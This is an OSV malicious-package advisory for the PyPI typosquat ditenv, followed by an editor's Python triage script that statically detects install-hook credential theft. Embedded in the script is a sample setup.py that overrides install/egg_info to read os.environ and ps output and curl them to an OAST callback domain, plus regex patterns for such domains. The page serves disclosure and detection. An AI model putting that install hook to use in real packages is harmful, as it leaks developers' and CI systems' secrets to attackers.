MAL-2026-6381

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/ditenv/MAL-2026-6381.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6381
Published
2026-06-24T06:41:09Z
Modified
2026-06-25T03:31:24.490012905Z
Summary
Malicious code in ditenv (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb)

setup.py overrides the install and egg_info commands with a RunCommand() class that fires unconditionally on pip install or pip download. The override reads the entire process environment via os.environ, serializes every key=value pair, captures the output of ps -elf, and POSTs the combined payload over plaintext HTTP via curl to a hardcoded interactsh/OAST subdomain (gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun). On developer machines and CI runners, the captured environment routinely contains AWS_SECRET_ACCESS_KEY, GH_TOKEN, NPM_TOKEN, PYPI_TOKEN, and similar credentials, all of which are leaked to an arbitrary attacker-controlled callback host. The package name is suggestive of a dotenv typosquat and the README self-identifies as a proof-of-concept; a comment claims the code is 'for research not for doing any harmful activity', but the cover story does not change the fact that any installer is subjected to live credential theft.

Source: kam193 (6d0048d35301edad3a673cfd44c244a805586b25d3027758738aa8939099f1cc)

During installation, the package exfiltrates env variables


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting
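
The amazon-inspector write-up and the campaign reasons above describe one recognisable static signature: a cmdclass override of install/egg_info, a read of os.environ, a process listing, and an outbound curl to an OAST callback domain. The following Python triage script is an editor's example added to this page; it is not part of the OSV record, the ossf/malicious-packages tooling, or Amazon Inspector. It parses a setup.py with the standard ast module and reports those indicators without ever importing or executing the file. The sample setup.py it scans is constructed here to mirror the structure the advisory describes (it is only parsed, never run); the OAST base domains other than oast.fun are assumed interactsh/Burp Collaborator defaults, not something the advisory states.

```python
from __future__ import annotations

import ast
import re
from dataclasses import dataclass

# setuptools/distutils commands that run during `pip install` and during the
# metadata build that `pip download` triggers for an sdist.
HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}

# Ways setup.py can spawn a child process (curl, ps, ...).
EXEC_FUNCS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_call", "subprocess.check_output",
              "os.system", "os.popen"}

# oast.fun comes from this advisory's IOCs; the remaining base domains are
# ASSUMED interactsh / Burp Collaborator defaults, not from the advisory.
OAST_DOMAIN_RE = re.compile(
    r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\."
    r"(?:oast\.(?:fun|pro|live|site|online|me)|interact\.sh|oastify\.com|burpcollaborator\.net)\b",
    re.I,
)


@dataclass(frozen=True)
class Finding:
    kind: str
    detail: str
    line: int


def _dotted_name(func: ast.expr) -> str:
    """Render a call target such as subprocess.run as 'subprocess.run'."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _dotted_name(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return ""


def scan_setup_py(source: str) -> list[Finding]:
    """Walk the AST of a setup.py and collect install-hook and exfiltration indicators."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            # class RunCommand(install): ...
            for base in node.bases:
                name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if name in HOOKED_COMMANDS:
                    findings.append(Finding("hook_subclass", f"class {node.name}({name})", node.lineno))
        elif isinstance(node, ast.Call) and _dotted_name(node.func) == "setup":
            # setup(..., cmdclass={"install": RunCommand, "egg_info": ...})
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in HOOKED_COMMANDS:
                            findings.append(Finding("cmdclass_override", f"cmdclass[{key.value!r}]", key.lineno))
        elif isinstance(node, ast.Call) and _dotted_name(node.func) in EXEC_FUNCS:
            findings.append(Finding("exec_call", _dotted_name(node.func), node.lineno))
        elif (isinstance(node, ast.Attribute) and node.attr == "environ"
              and isinstance(node.value, ast.Name) and node.value.id == "os"):
            findings.append(Finding("env_read", "os.environ", node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if m := OAST_DOMAIN_RE.search(s):
                findings.append(Finding("oast_domain", m.group(0), node.lineno))
            if s.startswith("http://"):
                findings.append(Finding("plaintext_http", s, node.lineno))
            if re.search(r"\bcurl\b", s):
                findings.append(Finding("curl", s, node.lineno))
            if re.fullmatch(r"ps(\s+-\w+)*", s):
                findings.append(Finding("proc_listing", s, node.lineno))
    return findings


def triage(source: str) -> dict:
    """Verdict = install hook + local collection + an outbound channel or child process."""
    findings = scan_setup_py(source)
    kinds = {f.kind for f in findings}
    hooked = bool(kinds & {"hook_subclass", "cmdclass_override"})
    collects = bool(kinds & {"env_read", "proc_listing"})
    channel = bool(kinds & {"oast_domain", "plaintext_http", "curl"})
    if hooked and collects and (channel or "exec_call" in kinds):
        verdict = "malicious-install-hook"
    elif hooked:
        verdict = "suspicious-install-hook"   # legitimate post-install hooks land here: review by hand
    else:
        verdict = "clean"
    return {"verdict": verdict, "kinds": sorted(kinds), "findings": findings}


# CONSTRUCTED sample mirroring the structure the advisory describes; it is only
# parsed by ast, never executed. The callback domain is the advisory's IOC.
SAMPLE_SETUP_PY = '''\
import os
import subprocess
from setuptools import setup
from setuptools.command.install import install

class RunCommand(install):
    def run(self):
        env = "\\n".join(f"{k}={v}" for k, v in os.environ.items())
        procs = subprocess.check_output(["ps", "-elf"]).decode()
        subprocess.run(["curl", "-s", "-X", "POST", "--data-binary", "@-",
                        "http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun"],
                       input=(env + procs).encode())
        install.run(self)

setup(name="ditenv", version="0.0.1",
      cmdclass={"install": RunCommand, "egg_info": RunCommand})
'''

# CONSTRUCTED benign control: plain setup() with no command overrides.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="example-pkg", version="1.0", packages=["example_pkg"])\n'

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        result = triage(src)
        print(f"{label}: {result['verdict']}")
        for f in result["findings"]:
            print(f"  line {f.line:>2}  {f.kind:<17} {f.detail}")
```

Run it against the setup.py extracted from an sdist (tar.gz) before that sdist is ever handed to pip; a wheel carries no setup.py, so this check covers the sdist build path the advisory describes and says nothing about code inside the wheel itself. The domain list is deliberately a regex rather than an exact IOC match so that a fresh interactsh subdomain from the same campaign is still caught.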

Database specific
{
    "iocs": {
        "domains": [
            "gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun"
        ]
    },
    "malicious-packages-origins": [
        {
            "sha256": "6d0048d35301edad3a673cfd44c244a805586b25d3027758738aa8939099f1cc",
            "import_time": "2026-06-24T07:47:34.49949455Z",
            "source": "kam193",
            "modified_time": "2026-06-24T06:41:09.531667Z",
            "versions": [
                "0.0.1"
            ],
            "id": "pypi/2026-06-ip-rotat/ditenv"
        },
        {
            "sha256": "f0a52dbba9abeff2c606bcbc862027da259fcbd3938c827abfdbdb06ba801ecb",
            "import_time": "2026-06-25T03:13:55.59686211Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-25T01:52:38Z",
            "versions": [
                "0.0.1"
            ],
            "id": "IN-MAL-2026-007454"
        }
    ]
}
Affected packages

PyPI / ditenv

Package: PyPI / ditenv
Affected ranges: 0.*
Affected versions: 0.0.1

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/ditenv/MAL-2026-6381.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "sha256": "36f6db5f6abbdde271d1b8b35cfff8296b632161f6b560855aafc1eac934fce8",
            "tlsh": "06316207e0bf19291ec344a0558f03959bc0e3a32f6431fab1fc29191f0b129113b8af",
            "path": "setup.py"
        },
        {
            "sha256": "15b4bdf3da6546bc391d6629e1b6a0fa9d17d037a275392dd16191ca312a51ed",
            "tlsh": "6341873f8b9493341a211993355e62d4cb0f78bab6b184d47c7d09a5b217dae80333d2",
            "path": "README.md"
        }
    ],
    "package_integrity": [
        {
            "filename": "ditenv-0.0.1-py3-none-any.whl",
            "hashes": {
                "sha256": "47e3f46d84b29815c49496ff52db72f8539a72b2dbc22281d763c705eedf222e",
                "md5": "a0466995f12bc0b803d4b86f079a9880",
                "blake2b_256": "1cf02d2c7ba7ec5203186db3de714deeecae54a19a0bbe88432c81c4ac1cc2fe"
            }
        },
        {
            "filename": "ditenv-0.0.1.tar.gz",
            "hashes": {
                "sha256": "7ce72def41d507c426f8c0460e2ad7af4eb5e7dfa9dcc6f4823ccea5448f289a",
                "md5": "c9cfe54ecbfa2011c773fca517ac8e8a",
                "blake2b_256": "0cb7b3a7b74888c551ef8e6317c199514ddff18bb215f906bc68ee67e9d7c921"
            }
        }
    ]
}